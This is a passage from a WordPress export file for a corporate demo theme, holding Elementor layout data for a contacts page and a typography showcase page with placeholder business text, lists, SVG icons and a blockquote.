		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[457]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.14]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"86d48d0","elType":"section","settings":{"gap":"extended","structure":"21","padding":{"unit":"px","top":"116","right":"0","bottom":"0","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"1feabce","elType":"column","settings":{"_column_size":33,"_inline_size":43,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"030e332","elType":"widget","settings":{"sub":"contact details","title":"Our Contacts","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"header_size":"h3","is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"},{"id":"588e854","elType":"widget","settings":{"editor":"Give us a call or drop by anytime, we endeavour to answer all enquiries within 24 hours on business days. We will be happy to answer your questions.","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"130afd7","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title":"Visit Us Daily","header_size":"h6","des":"411 University St, Seattle, USA","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"is_line":"","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"icon_space":{"unit":"px","size":76,"sizes":[]},"icon_size":{"unit":"px","size":27,"sizes":[]},"icon_bg_width":{"unit":"px","size":60,"sizes":[]},"radius_box":{"unit":"%","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_bg":"#55BB531A","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"title_space_top":{"unit":"px","size":6,"sizes":[]},"title_space_bottom":{"unit":"px","size":1,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"8ab1650","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title":"Call Us 24\/7","header_size":"h6","des":"+1-800-456-478-23","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"is_line":"","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"icon_space":{"unit":"px","size":76,"sizes":[]},"icon_size":{"unit":"px","size":22,"sizes":[]},"icon_bg_width":{"unit":"px","size":60,"sizes":[]},"radius_box":{"unit":"%","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_bg":"#55BB531A","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"title_space_top":{"unit":"px","size":6,"sizes":[]},"title_space_bottom":{"unit":"px","size":1,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"f3cf3dd","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title":"Mail Us","header_size":"h6","des":"maxbizz@mail.com","link":{"url":"mailto: maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"is_line":"","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"icon_space":{"unit":"px","size":76,"sizes":[]},"icon_size":{"unit":"px","size":24,"sizes":[]},"icon_bg_width":{"unit":"px","size":60,"sizes":[]},"radius_box":{"unit":"%","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_bg":"#55BB531A","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"title_space_top":{"unit":"px","size":6,"sizes":[]},"title_space_bottom":{"unit":"px","size":1,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600"},"elements":[],"widgetType":"iiconbox2"}],"isInner":false},{"id":"89ca7e2","elType":"column","settings":{"_column_size":66,"_inline_size":56.66499999999999914734871708787977695465087890625,"_inline_size_tablet":100},"elements":[{"id":"4fb28a7","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image-contacts.png","id":465},"image_size":"full","_margin":{"unit":"px","top":"-46","right":"-120","bottom":"0","left":"-70","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"a5be57a","elType":"section","settings":{"margin":{"unit":"px","top":"-245","right":0,"bottom":"0","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-100","right":0,"bottom":"0","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"-10","right":0,"bottom":"50","left":0,"isLinked":false},"z_index":1},"elements":[{"id":"574fa46","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"12e32dc","elType":"widget","settings":{"cf7":"1319","_padding":{"unit":"px","top":"60","right":"60","bottom":"60","left":"60","isLinked":true},"_padding_mobile":{"unit":"px","top":"50","right":"20","bottom":"50","left":"20","isLinked":false},"_background_background":"classic","_background_color":"#FFFFFF","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_box_shadow_box_shadow_type":"yes","_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[],"widgetType":"ictf7"}],"isInner":false}],"isInner":false},{"id":"de4c36a","elType":"section","settings":{"layout":"full_width","margin":{"unit":"px","top":"-60","right":0,"bottom":"0","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"","right":0,"bottom":"","left":0,"isLinked":true},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false}},"elements":[{"id":"f31c287","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"3e66202","elType":"widget","settings":{"address":"411 University St, Seattle, USA","height":{"unit":"px","size":520,"sizes":[]},"css_filters_css_filter":"custom","css_filters_saturate":{"unit":"px","size":0,"sizes":[]}},"elements":[],"widgetType":"google_maps"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:8:"iheading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:3:"sub";i:1;s:5:"title";i:1;s:11:"header_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:5:{s:9:"stitle_bg";i:1;s:27:"title_typography_typography";i:1;s:33:"title_typography_font_size_mobile";i:1;s:28:"stitle_typography_typography";i:1;s:27:"stitle_typography_font_size";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:9:"iiconbox2";a:3:{s:5:"count";i:3;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:5:{s:9:"icon_font";i:3;s:5:"title";i:3;s:11:"header_size";i:3;s:3:"des";i:3;s:4:"link";i:3;}}s:5:"style";a:3:{s:17:"style_box_section";a:2:{s:7:"is_line";i:3;s:7:"icon_bg";i:3;}s:18:"style_icon_section";a:6:{s:10:"icon_space";i:3;s:9:"icon_size";i:3;s:13:"icon_bg_width";i:3;s:10:"radius_box";i:3;s:27:"icon_shadow_box_shadow_type";i:3;s:22:"icon_shadow_box_shadow";i:3;}s:21:"style_content_section";a:5:{s:15:"title_space_top";i:3;s:18:"title_space_bottom";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:4;s:19:"_inline_size_tablet";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:13:"margin_tablet";i:1;s:13:"margin_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:1;s:10:"image_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:2:{s:14:"section_layout";a:2:{s:3:"gap";i:1;s:6:"layout";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:6:{s:7:"padding";i:1;s:14:"padding_mobile";i:1;s:6:"margin";i:2;s:13:"margin_tablet";i:2;s:13:"margin_mobile";i:2;s:7:"z_index";i:1;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:3:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}s:19:"_section_background";a:2:{s:22:"_background_background";i:1;s:17:"_background_color";i:1;}s:15:"_section_border";a:3:{s:14:"_border_radius";i:1;s:27:"_box_shadow_box_shadow_type";i:1;s:22:"_box_shadow_box_shadow";i:1;}}}}s:11:"google_maps";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:11:"section_map";a:2:{s:7:"address";i:1;s:6:"height";i:1;}}s:5:"style";a:1:{s:17:"section_map_style";a:2:{s:22:"css_filters_css_filter";i:1;s:20:"css_filters_saturate";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Typography</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/typography/</link>
		<pubDate>Mon, 07 Sep 2020 04:22:37 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=471</guid>
		<description></description>
		<content:encoded><![CDATA[<h1>Heading 1</h1>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h2>Heading 2</h2>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h3>Heading 3</h3>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h4>Heading 4</h4>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h5>Heading 5</h5>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h6>Heading 6</h6>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h4>IV Columns</h4>		
		<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.</p><p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.</p><p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.</p><p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.</p>		
			<h4>III Columns</h4>		
		<p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.</p><p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.</p><p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.</p>		
			<h4>II Columns</h4>		
		<p>Characterised by its suitability for use in a wide range of contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue, available in pentagonal or hexagonal form and the elements that stand out for their striking backrests in saddle hide.</p><p>Characterised by its suitability for use in a wide range of contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue, available in pentagonal or hexagonal form and the elements that stand out for their striking backrests in saddle hide.</p>		
			<h4>Text Elements</h4>		
		<p>Three of these curves describe an initial Covid-related spike in demand, and three describe a short-term hit. Where each group begins to diverge, however, is in what’s likely to happen to demand over the next several years. Think, for example, of personal computer monitors or other types of goods that were declining pre-pandemic and fall into the “short-term spike, long-term decline” archetype. The story is different for online grocery shopping and collaboration services like Zoom (short-term spike, long-term growth), both of which were growing steadily before the pandemic. <em>Experimentation during the crisis has convinced more and more customers that ordering or meeting online makes sense, pulling forward demand that will likely stick</em>.</p>		
			<h4>Highlights</h4>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p><p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h4>Dropcaps</h4>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape.</p><p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape.</p>		
			<h4>Listings</h4>		
		<ol><li>Customer Experience</li><li>New Business Innovation</li><li>Sales and Marketing</li></ol><ul><li>Customer Experience</li><li>New Business Innovation</li><li>Sales and Marketing</li></ul>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 490.688 490.688" style="enable-background:new 0 0 490.688 490.688;" xml:space="preserve">
<path style="fill:#FFC107;" d="M472.328,120.529L245.213,347.665L18.098,120.529c-4.237-4.093-10.99-3.975-15.083,0.262  c-3.992,4.134-3.992,10.687,0,14.82l234.667,234.667c4.165,4.164,10.917,4.164,15.083,0l234.667-234.667  c4.237-4.093,4.354-10.845,0.262-15.083c-4.093-4.237-10.845-4.354-15.083-0.262c-0.089,0.086-0.176,0.173-0.262,0.262  L472.328,120.529z"></path>
<path d="M245.213,373.415c-2.831,0.005-5.548-1.115-7.552-3.115L2.994,135.633c-4.093-4.237-3.975-10.99,0.262-15.083  c4.134-3.992,10.687-3.992,14.82,0l227.136,227.115l227.115-227.136c4.093-4.237,10.845-4.354,15.083-0.262  c4.237,4.093,4.354,10.845,0.262,15.083c-0.086,0.089-0.173,0.176-0.262,0.262L252.744,370.279  C250.748,372.281,248.039,373.408,245.213,373.415z"></path>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Customer Experience
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 490.688 490.688" style="enable-background:new 0 0 490.688 490.688;" xml:space="preserve">
<path style="fill:#FFC107;" d="M472.328,120.529L245.213,347.665L18.098,120.529c-4.237-4.093-10.99-3.975-15.083,0.262  c-3.992,4.134-3.992,10.687,0,14.82l234.667,234.667c4.165,4.164,10.917,4.164,15.083,0l234.667-234.667  c4.237-4.093,4.354-10.845,0.262-15.083c-4.093-4.237-10.845-4.354-15.083-0.262c-0.089,0.086-0.176,0.173-0.262,0.262  L472.328,120.529z"></path>
<path d="M245.213,373.415c-2.831,0.005-5.548-1.115-7.552-3.115L2.994,135.633c-4.093-4.237-3.975-10.99,0.262-15.083  c4.134-3.992,10.687-3.992,14.82,0l227.136,227.115l227.115-227.136c4.093-4.237,10.845-4.354,15.083-0.262  c4.237,4.093,4.354,10.845,0.262,15.083c-0.086,0.089-0.173,0.176-0.262,0.262L252.744,370.279  C250.748,372.281,248.039,373.408,245.213,373.415z"></path>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										New Business Innovation
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 490.688 490.688" style="enable-background:new 0 0 490.688 490.688;" xml:space="preserve">
<path style="fill:#FFC107;" d="M472.328,120.529L245.213,347.665L18.098,120.529c-4.237-4.093-10.99-3.975-15.083,0.262  c-3.992,4.134-3.992,10.687,0,14.82l234.667,234.667c4.165,4.164,10.917,4.164,15.083,0l234.667-234.667  c4.237-4.093,4.354-10.845,0.262-15.083c-4.093-4.237-10.845-4.354-15.083-0.262c-0.089,0.086-0.176,0.173-0.262,0.262  L472.328,120.529z"></path>
<path d="M245.213,373.415c-2.831,0.005-5.548-1.115-7.552-3.115L2.994,135.633c-4.093-4.237-3.975-10.99,0.262-15.083  c4.134-3.992,10.687-3.992,14.82,0l227.136,227.115l227.115-227.136c4.093-4.237,10.845-4.354,15.083-0.262  c4.237,4.093,4.354,10.845,0.262,15.083c-0.086,0.089-0.173,0.176-0.262,0.262L252.744,370.279  C250.748,372.281,248.039,373.408,245.213,373.415z"></path>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Sales and Marketing
									</li>
						</ul>
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 492 492" style="enable-background:new 0 0 492 492;" xml:space="preserve">
<g>
	<g>
		<path d="M465.064,207.566l0.028,0H284.436V27.25c0-14.84-12.016-27.248-26.856-27.248h-23.116    c-14.836,0-26.904,12.408-26.904,27.248v180.316H26.908c-14.832,0-26.908,12-26.908,26.844v23.248    c0,14.832,12.072,26.78,26.908,26.78h180.656v180.968c0,14.832,12.064,26.592,26.904,26.592h23.116    c14.84,0,26.856-11.764,26.856-26.592V284.438h180.624c14.84,0,26.936-11.952,26.936-26.78V234.41    C492,219.566,479.904,207.566,465.064,207.566z"></path>
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Customer Experience
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 492 492" style="enable-background:new 0 0 492 492;" xml:space="preserve">
<g>
	<g>
		<path d="M465.064,207.566l0.028,0H284.436V27.25c0-14.84-12.016-27.248-26.856-27.248h-23.116    c-14.836,0-26.904,12.408-26.904,27.248v180.316H26.908c-14.832,0-26.908,12-26.908,26.844v23.248    c0,14.832,12.072,26.78,26.908,26.78h180.656v180.968c0,14.832,12.064,26.592,26.904,26.592h23.116    c14.84,0,26.856-11.764,26.856-26.592V284.438h180.624c14.84,0,26.936-11.952,26.936-26.78V234.41    C492,219.566,479.904,207.566,465.064,207.566z"></path>
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										New Business Innovation
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 492 492" style="enable-background:new 0 0 492 492;" xml:space="preserve">
<g>
	<g>
		<path d="M465.064,207.566l0.028,0H284.436V27.25c0-14.84-12.016-27.248-26.856-27.248h-23.116    c-14.836,0-26.904,12.408-26.904,27.248v180.316H26.908c-14.832,0-26.908,12-26.908,26.844v23.248    c0,14.832,12.072,26.78,26.908,26.78h180.656v180.968c0,14.832,12.064,26.592,26.904,26.592h23.116    c14.84,0,26.856-11.764,26.856-26.592V284.438h180.624c14.84,0,26.936-11.952,26.936-26.78V234.41    C492,219.566,479.904,207.566,465.064,207.566z"></path>
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Sales and Marketing
									</li>
						</ul>
			<h4>Blockquote</h4>		
		<blockquote>“I cannot give you the formula for success, but I can give you the 
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>471</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 04:22:37]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 04:22:37]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[typography]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[473]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"8a5d04c","elType":"section","settings":{"padding":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"dc1cfdf","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"3925b8d","elType":"widget","settings":{"title":"Heading 1","header_size":"h1","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"9cdb2cf","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7594742","elType":"widget","settings":{"title":"Heading 2","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4f04e2d","elType":"widget","settings":{"editor":"<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic 